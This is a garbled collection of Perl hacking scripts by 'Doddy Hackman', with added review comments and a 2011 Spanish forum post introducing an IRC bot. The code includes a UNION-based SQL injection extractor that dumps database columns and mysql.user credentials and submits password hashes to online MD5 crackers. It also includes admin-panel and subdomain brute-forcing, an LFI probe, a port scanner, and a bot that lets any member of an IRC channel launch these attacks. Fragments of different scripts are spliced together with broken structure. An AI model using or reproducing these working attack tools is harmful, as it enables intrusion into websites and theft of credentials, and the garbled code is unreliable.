(82,65,84,83,88,80,68,79,87,78,49),Count (*),char (82,65,84,83,88,80,68,79,87,78,49))))/; $code3 = toma($page3.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass1."and".$pass1."table_schema=char(".ascii($db).")".$pass2); if ($code3=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) { print "\n[Columns length : $1 ]\n\n"; savefile($save.".txt","[Columns length : $1 ]\n"); my $si = $1; $page4=~s/hackman /unhex (hex(concat (char (82,65,84,83,88,80,68,79,87,78,49),column_name ,char (82,65,84,83,88,80,68,79,87,78,49))))/; $real = "1"; for 
my $limit2(0..$si) { $code4 = toma($page4.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass1."and".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$limit2.",1".$pass2); if ($code4=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) { print "[Column $real] : $1\n"; savefile($save.".txt","[Column $real] : $1"); $real++; } } } else { print "\n[-] information_schema = ERROR\n"; } } sub mysqluser { my ($page,$bypass,$save) = @_; my $cop = $page; my $cop1 = $page; savefile($save.".txt","\n"); print "\n\n[+] Finding mysql.users\n"; ($pass1,$pass2) = &bypass($bypass); $page =~s/hackman /concat (char (82,65,84,83,88,80,68,79,87,78,49))/; $code = toma($page.$pass1."from".$pass1."mysql.user".$pass2); if ($code=~/RATSXPDOWN/ig){ $cop1 =~s/hackman /unhex (hex(concat (char (82,65,84,83,88,80,68,79,87,78,49),Count (*),char (82,65,84,83,88,80,68,79,87,78,49))))/; $code1 = toma($cop1.$pass1."from".$pass1."mysql.user".$pass2); if ($code1=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) { print "\n[+] Users Found : $1\n\n"; savefile($save.".txt","\n[+] Users mysql Found : $1\n"); for my $limit(0..$1) { $cop =~s/hackman /unhex (hex(concat (0x524154535850444f574e ,Host ,0x524154535850444f574e ,User ,0x524154535850444f574e ,Password ,0x524154535850444f574e )))/; $code = toma($cop.$pass1."from".$pass1."mysql.user".$pass1."limit".$pass1.$limit.",1".$pass2); if ($code=~/RATSXPDOWN(.*)RATSXPDOWN(.*)RATSXPDOWN(.*)RATSXPDOWN/ig) { print "[Host] : $1 [User] : $2 [Password] : $3\n"; savefile($save.".txt","[Host] : $1 [User] : $2 [Password] : $3"); } else { &reload; } } } } else { print "\n[-] mysql.user = ERROR\n\n"; } } savefile($_[5].".txt","\n"); my $page = $_[0]; ($pass1,$pass2) = &bypass($_[4]); if ($page=~/(.*)hackman(.*)/){ my $start = $1; my $end = $2; print "\n\n[+] Extracting values...\n\n"; $concatx = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),count($_[1]),char(69,82,84,79,82,56,53,52))))"; $val_code = 
toma($start.$concatx.$end.$pass1."from".$pass1.$_[3].$pass2); $concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),$_[1],char(69,82,84,79,82,56,53,52),$_[2],char(69,82,84,79,82,56,53,52))))"; if ($val_code=~/ERTOR854(.*)ERTOR854/ig) { $tota = $1; print "[+] Table : $_[3]\n"; print "[+] Length of the rows : $tota\n\n"; print "[$_[1]] [$_[2]]\n\n"; savefile($_[5].".txt","[Table] : $_[3]"); savefile($_[5].".txt","[+] Length of the rows: $tota\n"); savefile($_[5].".txt","[$_[1]] [$_[2]]\n"); for my $limit(0..$tota) { $injection = toma($start.$concat.$end.$pass1."from".$pass1.$_[3].$pass1."limit".$pass1.$limit.",1".$pass2); if ($injection=~/ERTOR854(.*)ERTOR854(.*)ERTOR854/ig) { savefile($_[5].".txt","[$_[1]] : $1 [$_[2]] : $2"); print "[$_[1]] : $1 [$_[2]] : $2\n"; } else { print "\n\n[+] Extracting Finish\n\n"; &reload; } } } else { print "[-] Not Found any DATA\n\n"; }}} sub bypass { if ($_[0] eq "/*") { return ("/**/","/*"); } elsif ($_[0] eq "%20") { return ("%20","%00"); } sub ascii { } sub base { $re = encode_base64($_[0]); } sub base_de { $re = decode_base64($_[0]); } sub download { if ($nave->mirror($_[0],$_[1])) { if (-f $_[1]) { }}} sub hex_en { my $string = $_[0]; $hex = '0x'; } } sub hex_de { $text =~ s/^0x//; } sub ascii_de { } sub getprocess { my %procesos; my $uno = Win32::OLE->new("WbemScripting.SWbemLocator"); my $dos = $uno->ConnectServer("","root\\cimv2"); foreach my $pro (in $dos->InstancesOf("Win32_Process")){ $procesos{$pro->{Caption}} = $pro->{ProcessId}; } } sub killprocess { my ($numb,$pid) = @_; if (Win32::Process::KillProcess($pid,$numb)) { } else { } } sub getip { } sub crackit { my $secret = $_[0]; print "[+] Cracking $_[0]\n\n"; my %hash = ( 'http://passcracking.com/' => { 'tipo' => 'post', 'variables'=>'{"datafromuser" => $_[0], "submit" => "DoIT"}', 'regex'=>'<\/td><td>md5 Database<\/td><td>$_[0]<\/td><td bgcolor=#FF0000>(.*)<\/td><td>', }, 'http://md5.hashcracking.com/search.php?md5=' => { 'tipo' => 'get', 'regex' => 'Cleartext of 
$_[0] is (.*)', }, 'http://www.bigtrapeze.com/md5/' => { 'tipo' => 'post', 'variables'=>'{"query" => $_[0], "submit" => " Crack "}', 'regex' => 'The hash <strong>$_[0]<\/strong> has been deciphered to: <strong>(.+)<\/strong>', }, 'http://opencrack.hashkiller.com/' => { 'tipo' => 'post', 'variables'=>'{"oc_check_md5" => $_[0], "submit" => "Search MD5"}', 'regex' => qq(<\ /div ><div class ="result">$_[0]:(.+)<br\ />), }, 'http://www.hashchecker.com/index.php?_sls=search_hash' => { 'tipo' => 'post', 'variables'=>'{"search_field" => $_[0], "Submit" => "search"}', 'regex' => '<td><li>Your md5 hash is :<br><li>$_[0] is <b>(.*)<\/b> used charl', }, 'http://victorov.su/md5/?md5e=&md5d=' => { 'tipo' => 'get', 'regex' => qq(MD5 ðàñøèôðîâàí : <b>(.*)<\ /b ><br><form action =\ "\">), } ); for my $data(keys %hash) { if ($hash{$data}{tipo} eq "get") { $code = toma($data.$_[0]); if ($code=~/$hash{$data}{regex}/ig) { print "\n[+] Decoded : ".$1."\n\n"; saveyes("logs/pass-found.txt",$secret.":".$1); } } else { $code = tomar($data,$hash{$data}{variables}); if ($code=~/$hash{$data}{regex}/ig) { saveyes("logs/pass-found.txt",$secret.":".$1); } } } print "\n[+] Finish\n"; } sub ftp { my ($ftp,$user,$pass) = @_; if (my $socket = Net::FTP->new($ftp)) { if ($socket->login($user,$pass)) { print "\n[+] Enter of the server FTP\n\n"; menu: print "\n\nftp>"; chomp (my $cmd = <stdin>); print "\n\n"; if ($cmd=~/help/) { print q( help : show information cd : change directory <dir> dir : list a directory mdkdir : create a directory <dir> rmdir : delete a directory <dir> pwd : directory del : delete a file <file> rename : change name of the a file <file1> <file2> size : size of the a file <file> put : upload a file <file> get : download a file <file> cdup : change dir <dir> exit : ?? 
); } if ($cmd=~/dir/ig) { if (my @files = $socket->dir()) { for(@files) { print "[+] ".$_."\n"; } } else { print "\n\n[-] Error\n\n"; } } if ($cmd=~/pwd/ig) { print "[+] Path : ".$socket->pwd()."\n"; } if ($cmd=~/cd (.*)/ig) { if ($socket->cwd($1)) { print "[+] Directory changed\n"; } else { print "\n\n[-] Error\n\n"; } } if ($cmd=~/cdup/ig) { if (my $dir = $socket->cdup()) { print "\n\n[+] Directory changed\n\n"; } else { print "\n\n[-] Error\n\n"; } } if ($cmd=~/del (.*)/ig) { if ($socket->delete($1)) { print "[+] File deleted\n"; } else { print "\n\n[-] Error\n\n"; } } if ($cmd=~/rename (.*) (.*)/ig) { if ($socket->rename($1,$2)) { print "[+] File Updated\n"; } else { print "\n\n[-] Error\n\n"; } } if ($cmd=~/mkdir (.*)/ig) { if ($socket->mkdir($1)) { print "\n\n[+] Directory created\n"; } else { print "\n\n[-] Error\n\n"; } } if ($cmd=~/rmdir (.*)/ig) { if ($socket->rmdir($1)) { print "\n\n[+] Directory deleted\n"; } else { print "\n\n[-] Error\n\n"; } } if ($cmd=~/exit/ig) { next; } if ($cmd=~/get (.*) (.*)/ig) { print "\n\n[+] Downloading file\n\n"; if ($socket->get($1,$2)) { print "[+] Download completed"; } else { print "\n\n[-] Error\n\n"; } } if ($cmd=~/put (.*) (.*)/ig) { print "\n\n[+] Uploading file\n\n"; if ($socket->put($1,$2)) { print "[+] Upload completed"; } else { print "\n\n[-] Error\n\n"; } } if ($cmd=~/quit/) { next; } goto menu; } else { print "\n[-] Failed the login\n\n"; } } else { print "\n\n[-] Error\n\n"; } } sub scanpaths { my $urla = $_[0]; print "\n[+] Find paths in $urla\n\n\n"; my @urls = repes(get_links(toma($urla))); for $url(@urls) { my $web = $url; my ($scheme, $auth, $path, $query, $frag) = uri_split($url); if ($_[0] =~/$auth/ or $auth eq "") { if ($path=~/(.*)\/(.*)\.(.*)$/) { my $borrar = $2.".".$3; if ($web=~/(.*)$borrar/) { my $co = $1; unless ($co=~/$auth/) { $co = $urla.$co; } $code = toma($co); if ($code=~/Index Of/ig) { print "[Link] : ".$co."\n"; saveyes("logs/paths-found.txt",$co); }}}}} print "\n\n[+] Finish\n"; } 
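# --- Project STALKER: helper subs (tail of the script) ----------------------
# These subs are driven by the command dispatcher that precedes them (not
# shown here). They rely on file-level state defined earlier in the file:
#   $nave    - the LWP::UserAgent every HTTP request goes through
#   @panels  - admin-panel path wordlist probed by scanpanel()
#   cprint   - console colour printer imported earlier (assumed - not visible)
# Review changes in this copy: get_links()/repes()/google() no longer keep
# their results in package globals (every call used to return everything the
# previous calls had found as well); conectar() checks the connect; the log
# writers use three-argument open and report failures; enter()'s lost exit
# test is restored and marked as such.

# scanport(host): connect-scan six well-known TCP ports on $host and print
# the ones that accept a connection. Ports are tried in numeric order (the
# original walked a hash, so the order was random).
sub scanport {
    my ($host) = @_;
    my %service_of = (
        "21"   => "ftp",
        "22"   => "ssh",
        "25"   => "smtp",
        "80"   => "http",
        "110"  => "pop3",
        "3306" => "mysql",
    );
    print "[+] Scanning $host\n\n\n";
    for my $port (sort { $a <=> $b } keys %service_of) {
        # 0.5 s connect timeout: closed/filtered ports simply never print.
        my $sock = IO::Socket::INET->new(
            PeerAddr => $host,
            PeerPort => $port,
            Proto    => "tcp",
            Timeout  => 0.5,
        );
        if ($sock) {
            print "[Port] : " . $port . " [Service] : " . $service_of{$port} . "\n";
            $sock->close;   # the original left the handle open until GC
        }
    }
    print "\n\n[+] Finish\n";
}

# scanpanel(base_url): request base_url/<path> for every entry of @panels and
# print/log the ones answered with a 2xx. There is no delay between
# requests, so this hammers the target with a few hundred requests in a row.
sub scanpanel {
    my ($base) = @_;
    print "[+] Scanning $base\n\n\n";
    for my $path (@panels) {
        my $url      = $base . "/" . $path;
        my $response = tomax($url);
        if ($response->is_success) {
            print "[Link] : " . $url . "\n";
            saveyes("logs/panel-logs.txt", $url);
        }
    }
    print "\n\n[+] Finish\n";
}

# google(dork, max_start): scrape Google result pages start=10,20,..,max_start
# for the dork, extract the target URLs from the "cache:" links and return
# them de-duplicated. The first result page (start=0) is never fetched; that
# is how the original behaved and is kept here - confirm before relying on it.
sub google {
    my ($dork, $max_start) = @_;
    my @cache_links;
    for (my $start = 10; $start <= $max_start; $start += 10) {
        my $html = toma("http://www.google.com.ar/search?hl=&q=" . $dork . "&start=$start");
        push @cache_links, grep { /webcache.googleusercontent.com/ } get_links($html);
    }
    my @targets;
    for my $link (@cache_links) {
        if ($link =~ /cache:(.*?):(.*?)\+/) {
            push @targets, $2;
        }
    }
    return repes(@targets);
}

# sql(url_with_param): append a one-column UNION probe and treat MySQL's
# column-count error in the body as "injectable"; a hit is printed (with a
# bell) and logged. Only that one error string is checked, so a target that
# hides errors is not proven safe. The literal "union " keeps the trailing
# space the original had.
sub sql {
    my ($page) = @_;
    my ($pass1, $pass2) = ("+", "--");
    my $body = toma($page . "-1" . $pass1 . "union " . $pass1 . "select" . $pass1 . "666" . $pass2);
    if ($body =~ /The used SELECT statements have a different number of columns/ig) {
        print "[+] SQLI : $page\a\n";
        saveyes("logs/sql-logs.txt", $page);
    }
}

# get_links(html): every attribute value HTML::LinkExtor reports for a
# link-bearing tag (href, src, ...) in $html, in document order. Results are
# now collected per call; the original pushed into a package global.
sub get_links {
    my ($html) = @_;
    my @found;
    my $extractor = HTML::LinkExtor->new(sub {
        my ($tag, %attr) = @_;
        push @found, values %attr;
    });
    $extractor->parse($html);
    return @found;
}

# repes(list): the list with duplicates removed, first occurrence wins.
# Stateless; the original remembered every value from earlier calls.
sub repes {
    my %seen;
    return grep { !$seen{$_}++ } @_;
}

# head(): banner, printed in the colour selected by cprint().
sub head {
    cprint("\x0311");
    print "\n\n-- == Project STALKER == --\n\n";
    cprint("\x030");
}

# copyright(): credits line in colour.
sub copyright {
    cprint("\x0311");
    print "\n\n(C) Doddy Hackman 2011\n\n";
    cprint("\x030");
}

# toma(url): GET $url through $nave and return the body (decoded content).
sub toma {
    my ($url) = @_;
    return $nave->get($url)->content;
}

# tomax(url): GET $url and return the whole HTTP::Response (callers test
# ->is_success).
sub tomax {
    my ($url) = @_;
    return $nave->get($url);
}

# tomar(url, \%form): POST the form fields and return the body. $var must be
# a hash reference; crackit() earlier in the file passes a quoted string
# instead, which dereferences to an empty hash and so posts no fields.
sub tomar {
    my ($web, $var) = @_;
    return $nave->post($web, [ %{$var} ])->content;
}

# conectar(host, port, line): open a TCP connection, send $line + CRLF, read
# up to 5000 bytes of reply and return it with CRLF appended. When the
# connect fails an error is printed and just "\r\n" is returned; the original
# dereferenced the undefined handle and died.
sub conectar {
    my ($host, $port, $line) = @_;
    my $sock = IO::Socket::INET->new(
        PeerAddr => $host,
        PeerPort => $port,
        Proto    => "tcp",
        Timeout  => 5,
    );
    unless ($sock) {
        print "\n[-] Error connecting to $host:$port\n";
        return "\r\n";
    }
    print $sock $line . "\r\n";
    my $reply = '';
    $sock->read($reply, 5000);   # one read; a slow server may hand back less than its full banner
    $sock->close;
    return $reply . "\r\n";
}

# enter(host, user, pass): interactive MySQL shell over DBI. Every line typed
# at the prompt is executed as-is; "exit" (or EOF on stdin) disconnects and
# returns. NOTE(review): the condition that ended the loop was lost in this
# copy - only the disconnect/last statements survived, directly after the
# prompt - so it is restored here as a plain string compare on "exit".
# The DSN literal is kept verbatim (no database selected, port 3306).
sub enter {
    my ($host, $user, $pass) = @_;
    print "[+] Connecting to the server\n";
    my $dsn = "dbi:mysql::" . $host . ":3306";
    my $dbh = DBI->connect($dsn, $user, $pass, { PrintError => 0 });
    unless ($dbh) {
        print "\n[-] Error connecting\n";
        return;
    }
    print "\n[+] Enter in the database";
    while (1) {
        print "\n\n\n[+] Query : ";
        my $query = <STDIN>;
        $query = "exit" unless defined $query;   # EOF behaves like typing exit
        chomp $query;
        if ($query eq "exit") {
            $dbh->disconnect;
            print "\n\n[+] Closing connection\n\n";
            last;
        }
        # With PrintError off, prepare() returns undef on a bad statement;
        # the original called execute() on that undef and died.
        my $sth = $dbh->prepare($query);
        unless ($sth && $sth->execute()) {
            print "\n\n[-] Query Error\n";
            next;
        }
        my $total    = $sth->rows();
        my @columnas = @{ $sth->{NAME} || [] };
        if ($total == -1) {
            print "\n\n[-] Query Error\n";
            next;
        }
        print "\n\n[+] Result of the query\n";
        if ($total == 0) {
            print "\n\n[+] Not rows returned\n\n";
            next;
        }
        print "\n\n[+] Rows returned : " . $total . "\n\n\n";
        print join("", map { $_ . "\t\t" } @columnas), "\n\n";
        while (my @row = $sth->fetchrow_array) {
            print join("", map { $_ . "\t\t" } @row), "\n";
        }
    }
    return;
}

# saveyes(file, line): append one line to $file (relative to the working
# directory, e.g. logs/...). An open failure is reported rather than hidden.
sub saveyes {
    my ($file, $line) = @_;
    open(my $fh, '>>', $file) or do {
        print "\n[-] Cannot write $file: $!\n";
        return;
    };
    print $fh $line . "\n";
    close $fh;
}

# savefile(name, line): like saveyes() but under logs/webs/.
sub savefile {
    my ($name, $line) = @_;
    saveyes("logs/webs/" . $name, $line);
}

# coleccionar(dir): the directory's entries (including . and ..), or an
# empty list when it cannot be opened.
sub coleccionar {
    my ($dir) = @_;
    opendir(my $dh, $dir) or return ();
    my @entries = readdir $dh;
    closedir $dh;   # the original called close() on the dirhandle, leaking it
    return @entries;
}

# helpme(): list the dispatcher's commands in colour.
sub helpme {
    cprint("\x0310");
    print qq(
Commands :

getinfo
getip <host>
getlink <page>
getprocess
killprocess <name process> <pid process>
conec <host> <port> <command>
allow <host>
paths <page>
encodehex <text>
decodehex <text>
encodeascii <text>
decodeascii <text>
encodebase <text>
decodebase <text>
scanport <host>
panel <page>
getpass <hash>
kobra <page>
ftp <host> <user> <pass>
mysql <host> <user> <pass>
navegator
scangoogle
help
exit
);
    cprint("\x030");
}

# The End ?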
Programación / Scripting / [Perl] Terr0r B0t By Doddy H
en: 7 Octubre 2011, 15:55 pm
Hola a todos. Hoy les traigo un programa que hice anoche: un bot IRC con las siguientes opciones:
* Codificación y decodificación de base64, hex y ASCII
* Búsqueda del panel de administración de un sitio
* Scan de SQLi (busca el número de columnas y muestra información de la base)
* Herramienta para explotar LFI

Comandos para el bot en el canal:
!base64 encode/decode string
!hex encode/decode string
!ascii encode/decode string
!panel http://127.0.0.1
!sqli http://127.0.0.1/sql.php?id=
!lfi http://127.0.0.1/lfi.php?file='
(El código también responde a !fuzzdns dominio, aunque no figura en esta lista.)
Forma de uso : C:/Users/DoddyH/Desktop/Arsenal X>terror-b0t.pl
[+] tERR0R b0T (c) dODDy HacKMaN 2010
[+] Starting the bot [+] Online
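#!/usr/bin/perl
# Terr0r B0t (C) Doddy Hackman 2010
#
# IRC bot that runs web-recon helpers on request from a channel.
# Commands to use (typed in the channel the bot joins):
#   !base64 encode/decode string
#   !hex encode/decode string
#   !ascii encode/decode string
#   !panel http://127.0.0.1
#   !sqli http://127.0.0.1/sql.php?id=
#   !lfi http://127.0.0.1/lfi.php?file='
#   !fuzzdns example.com      (handled by the dispatcher, missing from the original header)
#
# NOTE(review): nothing in the dispatcher checks who sent a command, so every
# member of $canal can launch HTTP scans from the host running this bot.
#
# Review notes on this copy of the script:
#  - IRC lines end in CRLF and the (.*)$ captures kept the CR, so every URL
#    and the PONG reply carried a trailing "\r"; the line is now trimmed first.
#  - $ok / $ct were package globals that were never reset, so a second !lfi
#    or !panel reported the previous result; they are per-call now.
#  - The bodies of ascii(), ascii_de(), encode() and decode() and the closing
#    braces around them were lost in the paste; they are rebuilt from how the
#    call sites use them and marked as reconstructed.
#  - @buscar3 (the LFI file list) is referenced but never defined anywhere in
#    the posted code; it is declared empty so the script compiles.

use IO::Socket;
use LWP::UserAgent;
use HTTP::Request::Common;
use MIME::Base64;

# hostname labels tried in front of the target domain by !fuzzdns
# ("s#ecure" in the original can never be a DNS label; read as "secure")
my @dns = qw(
    www www1 www2 www3 ftp ns mail 3com aix apache back bind boreder bsd
    business chains cisco content corporate cpv dns domino dominoserver
    download e-mail e-safe email esafe external extranet firebox firewall
    front fw fw0 fwe fw-1 firew gate gatekeeper gateway gauntlet group help
    hop hp hpjet hpux http https hub ibm ids info inside internal internet
    intranet ipfw irix jet list lotus lotusdomino lotusnotes lotusserver
    mailfeed mailgate mailgateway mailgroup mailhost maillist mailpop
    mailrelay mimesweeper ms msproxy mx nameserver news newsdesk newsfeed
    newsgroup newsroom newsserver nntp notes noteserver notesserver nt
    outside pix pop pop3 pophost popmail popserver print printer private
    proxy proxyserver public qpop raptor read redcreek redhat route router
    scanner screen screening secure seek smail smap smtp smtpgateway smtpgw
    solaris sonic spool squid sun sunos suse switch transfer trend
    trendmicro vlan vpn wall web webmail webserver webswitch win2000 win2k
    upload file fileserver storage backup share core gw wingate main noc
    home radius security access dmz domain sql mysql mssql postgres db
    database imail imap exchange sendmail louts test logs stage staging dev
    devel ppp chat irc eng admin unix linux windows apple hp-ux bigip pc
);

# admin-panel paths appended to the target URL by !panel
my @panels = qw(
    admin/admin.asp admin/login.asp admin/index.asp admin/admin.aspx
    admin/login.aspx admin/index.aspx admin/webmaster.asp
    admin/webmaster.aspx asp/admin/index.asp asp/admin/index.aspx
    asp/admin/admin.asp asp/admin/admin.aspx asp/admin/webmaster.asp
    asp/admin/webmaster.aspx admin/ login.asp login.aspx admin.asp
    admin.aspx webmaster.aspx webmaster.asp login/index.asp
    login/index.aspx login/login.asp login/login.aspx login/admin.asp
    login/admin.aspx administracion/index.asp administracion/index.aspx
    administracion/login.asp administracion/login.aspx
    administracion/webmaster.asp administracion/webmaster.aspx
    administracion/admin.asp administracion/admin.aspx php/admin/
    admin/admin.php admin/index.php admin/login.php admin/system.php
    admin/ingresar.php admin/administrador.php admin/default.php
    administracion/ administracion/index.php administracion/login.php
    administracion/ingresar.php administracion/admin.php administration/
    administration/index.php administration/login.php
    administrator/index.php administrator/login.php
    administrator/system.php system/ system/login.php admin.php login.php
    administrador.php administration.php administrator.php admin1.html
    admin1.php admin2.php admin2.html yonetim.php yonetim.html yonetici.php
    yonetici.html adm/ admin/account.php admin/account.html
    admin/index.html admin/login.html admin/home.php
    admin/controlpanel.html admin/controlpanel.php admin.html admin/cp.php
    admin/cp.html cp.php cp.html administrator/ administrator/index.html
    administrator/login.html administrator/account.html
    administrator/account.php administrator.html login.html
    modelsearch/login.php moderator.php moderator.html moderator/login.php
    moderator/login.html moderator/admin.php moderator/admin.html
    moderator/ account.php account.html controlpanel/ controlpanel.php
    controlpanel.html admincontrol.php admincontrol.html adminpanel.php
    adminpanel.html admin1.asp admin2.asp yonetim.asp yonetici.asp
    admin/account.asp admin/home.asp admin/controlpanel.asp admin/cp.asp
    cp.asp administrator/index.asp administrator/login.asp
    administrator/account.asp administrator.asp modelsearch/login.asp
    moderator.asp moderator/login.asp moderator/admin.asp account.asp
    controlpanel.asp admincontrol.asp adminpanel.asp fileadmin/
    fileadmin.php fileadmin.asp fileadmin.html administration.html
    sysadmin.php sysadmin.html phpmyadmin/ myadmin/ sysadmin.asp sysadmin/
    ur-admin.asp ur-admin.php ur-admin.html ur-admin/ Server.php
    Server.html Server.asp Server/ wp-admin/ administr8.php
    administr8.html administr8/ administr8.asp webadmin/ webadmin.php
    webadmin.asp webadmin.html administratie/ admins/ admins.php
    admins.asp admins.html administrivia/ Database_Administration/
    WebAdmin/ useradmin/ sysadmins/ admin1/ system-administration/
    administrators/ pgadmin/ directadmin/ staradmin/ ServerAdministrator/
    SysAdmin/ administer/ LiveUser_Admin/ sys-admin/ typo3/ panel/ cpanel/
    cPanel/ cpanel_file/ platz_login/ rcLogin/ blogindex/ formslogin/
    autologin/ support_login/ meta_login/ manuallogin/ simpleLogin/
    loginflat/ utility_login/ showlogin/ memlogin/ members/
    login-redirect/ sub-login/ wp-login/ login1/ dir-login/ login_db/
    xlogin/ smblogin/ customer_login/ UserLogin/ login-us/ acct_login/
    admin_area/ bigadmin/ project-admins/ phppgadmin/ pureadmin/
    sql-admin/ radmind/ openvpnadmin/ wizmysqladmin/ vadmind/
    ezsqliteadmin/ hpwebjetadmin/ newsadmin/ adminpro/ Lotus_Domino_Admin/
    bbadmin/ vmailadmin/ Indy_admin/ ccp14admin/ irc-macadmin/
    banneradmin/ sshadmin/ phpldapadmin/ macadmin/ administratoraccounts/
    admin4_account/ admin4_colon/ radmind-1/ Super-Admin/ AdminTools/
    cmsadmin/ SysAdmin2/ globes_admin/ cadmins/ phpSQLiteAdmin/
    navSiteAdmin/ server_admin_small/ logo_sysadmin/ server/
    database_administration/ power_user/ system_administration/
    ss_vms_admin_sm/
);

# NOTE(review): used by lfi() as the list of files to append to the LFI
# parameter, but never defined in the posted code; while it is empty every
# !lfi ends in "Dont found any file".
my @buscar3 = ();

my $nave = LWP::UserAgent->new();
$nave->timeout(13);
$nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");

print "\n[+] tERR0R b0T (c) dODDy HacKMaN 2010\n\n";

my $servidor = "127.0.0.1";    # IRC server
my $canal    = "#locos";       # channel to join on that server
my $nick     = "Lepuke-Slave"; # bot nickname
my $port     = "6667";         # IRC port (plain TCP; nothing here speaks TLS)

print "[+] Starting the bot\n";

my $soquete = IO::Socket::INET->new(
    PeerAddr => $servidor,
    PeerPort => $port,
    Proto    => 'tcp',
);
# The original only printed and then wrote to the undefined handle, which
# died with a Perl error a line later; stop cleanly instead.
if (!$soquete) {
    print "\n[-] No se puedo conectar en $servidor $port\n";
    exit 1;
}

print $soquete "NICK $nick\r\n";
print $soquete "USER $nick 1 1 1 1\r\n";
print $soquete "JOIN $canal\r\n";

# Dispatcher: one pass per server line. Any channel member's message that
# starts with a known "!command" triggers the helper.
while (my $log = <$soquete>) {
    $log =~ s/\r?\n\z//;   # drop the CRLF so the captures below stay clean

    if ($log =~ /^PING(.*)$/i) {
        print $soquete "PONG $1\r\n";
    }
    if ($log =~ m/:!panel (.*)$/) {
        scan($1);
        print $soquete "PRIVMSG $canal : [+] Scan Finished\r\n";
    }
    if ($log =~ m/:!sqli (.*)$/) {
        print $soquete "PRIVMSG $canal : [+] SQL Scan Starting\r\n";
        scan2($1);
    }
    if ($log =~ m/:!fuzzdns (.*)$/) {
        scan1($1);
        print $soquete "PRIVMSG $canal : [+] Scan Finished\r\n";
    }
    if ($log =~ m/:!lfi (.*)$/) {
        lfi($1);
        print $soquete "PRIVMSG $canal : [+] Scan Finished\r\n";
    }
    if ($log =~ m/:!base64 (.*) (.*)$/) {
        my ($opcion, $aa) = ($1, $2);
        if ($opcion eq "encode") {
            print $soquete "PRIVMSG $canal : [+] Text : $aa\r\n";
            # '' as line ending: the default appends "\n", which ended the
            # IRC message early and left a stray empty line behind it
            print $soquete "PRIVMSG $canal : [+] Encode : " . encode_base64($aa, '') . "\r\n";
        } elsif ($opcion eq "decode") {
            print $soquete "PRIVMSG $canal : [+] Encode : $aa\r\n";
            print $soquete "PRIVMSG $canal : [+] Text : " . decode_base64($aa) . "\r\n";
        } else {
            print $soquete "PRIVMSG $canal : ??\r\n";
        }
    }
    if ($log =~ m/:!ascii (.*) (.*)$/) {
        my ($opcion, $aa) = ($1, $2);
        if ($opcion eq "encode") {
            print $soquete "PRIVMSG $canal : [+] Text : $aa\r\n";
            print $soquete "PRIVMSG $canal : [+] Encode : " . ascii($aa) . "\r\n";
        } elsif ($opcion eq "decode") {
            print $soquete "PRIVMSG $canal : [+] Encode : $aa\r\n";
            print $soquete "PRIVMSG $canal : [+] Text : " . ascii_de($aa) . "\r\n";
        } else {
            print $soquete "PRIVMSG $canal : ???\r\n";
        }
    }
    if ($log =~ m/:!hex (.*) (.*)$/) {
        my ($opcion, $aa) = ($1, $2);
        if ($opcion eq "encode") {
            print $soquete "PRIVMSG $canal : [+] Text : $aa\r\n";
            print $soquete "PRIVMSG $canal : [+] Encode : " . encode($aa) . "\r\n";
        } elsif ($opcion eq "decode") {
            print $soquete "PRIVMSG $canal : [+] Encode : $aa\r\n";
            print $soquete "PRIVMSG $canal : [+] Text : " . decode($aa) . "\r\n";
        } else {
            print $soquete "PRIVMSG $canal : ????\r\n";
        }
    }
}

# lfi(url_with_param): fetch the URL as given and treat PHP's "No such file
# or directory" warning as the LFI/FPD signal; then append every entry of
# @buscar3 and report the ones that do not produce that warning.
sub lfi {
    my ($target) = @_;
    my $ok = 0;   # per call; the original's global stayed 1 after the first hit
    print $soquete "PRIVMSG $canal : [+] Target confirmed : $target" . "\r\n";
    print $soquete "PRIVMSG $canal : [+] Status : [scanning]" . "\r\n";
    my $code = toma($target);
    if ($code =~ /No such file or directory in <b>(.*)<\/b> on line/i) {
        my $fpd = $1;
        print $soquete "PRIVMSG $canal : [+] Vulnerable !" . "\r\n";
        print $soquete "PRIVMSG $canal : [*] Full path discloure detected : $fpd" . "\r\n";
        print $soquete "PRIVMSG $canal : [+] Status : [fuzzing files]" . "\r\n";
        for my $file (@buscar3) {
            my $code1 = toma($target . $file);
            unless ($code1 =~ /No such file or directory in <b>(.*)<\/b> on line/i) {
                $ok = 1;
                print $soquete "PRIVMSG $canal : [File Found] : " . $target . $file . "\r\n";
            }
        }
        unless ($ok == 1) {
            print $soquete "PRIVMSG $canal : [-] Dont found any file" . "\r\n";
        }
    } else {
        print $soquete "PRIVMSG $canal : [-] Page not vulnerable to LFI" . "\r\n";
    }
    return;
}

# scan1(domain): request http://<label>.<domain> for every label in @dns and
# post the ones that answer 2xx (subdomain discovery over HTTP, not DNS).
sub scan1 {
    my ($domain) = @_;
    print $soquete "PRIVMSG $canal : [*] Searching DNS to " . $domain . "\r\n";
    for my $path (@dns) {
        my $response = tomax("http://" . $path . "." . $domain);
        if ($response->is_success) {
            print $soquete "PRIVMSG $canal : http://" . $path . "." . $domain . "\r\n";
        }
    }
    return;
}

# scan(base_url): probe base_url/<path> for every entry of @panels and post
# the 2xx ones. The original PRIVMSGs lacked the " :" before the text, so the
# server only delivered the first word ("[*]", "[Link]", "[-]").
sub scan {
    my ($base) = @_;
    my $ct = 0;   # per call; the original's global was never reset
    print $soquete "PRIVMSG $canal : [*] Searching panels to " . $base . "\r\n";
    for my $path (@panels) {
        my $response = tomax($base . "/" . $path);
        if ($response->is_success) {
            $ct = 1;
            print $soquete "PRIVMSG $canal : [Link] : " . $base . "/" . $path . "\r\n";
        }
    }
    if ($ct != 1) {
        print $soquete "PRIVMSG $canal : [-] Not found any path\r\n";
    }
    return;
}

# scan2(url_with_param [, bypass]): MySQL UNION-based column discovery.
# 1. a broken "order by" must make the page show a MySQL/PHP error,
# 2. a one-column UNION must give the column-count error,
# 3. UNION SELECT with marker strings in 2..52 columns; the first reply that
#    echoes a marker tells the column count and which column prints, and the
#    injection with that column replaced by "hackman " is passed to details().
# The comment style comes from the second argument or, as in the original,
# from $ARGV[1].
sub scan2 {
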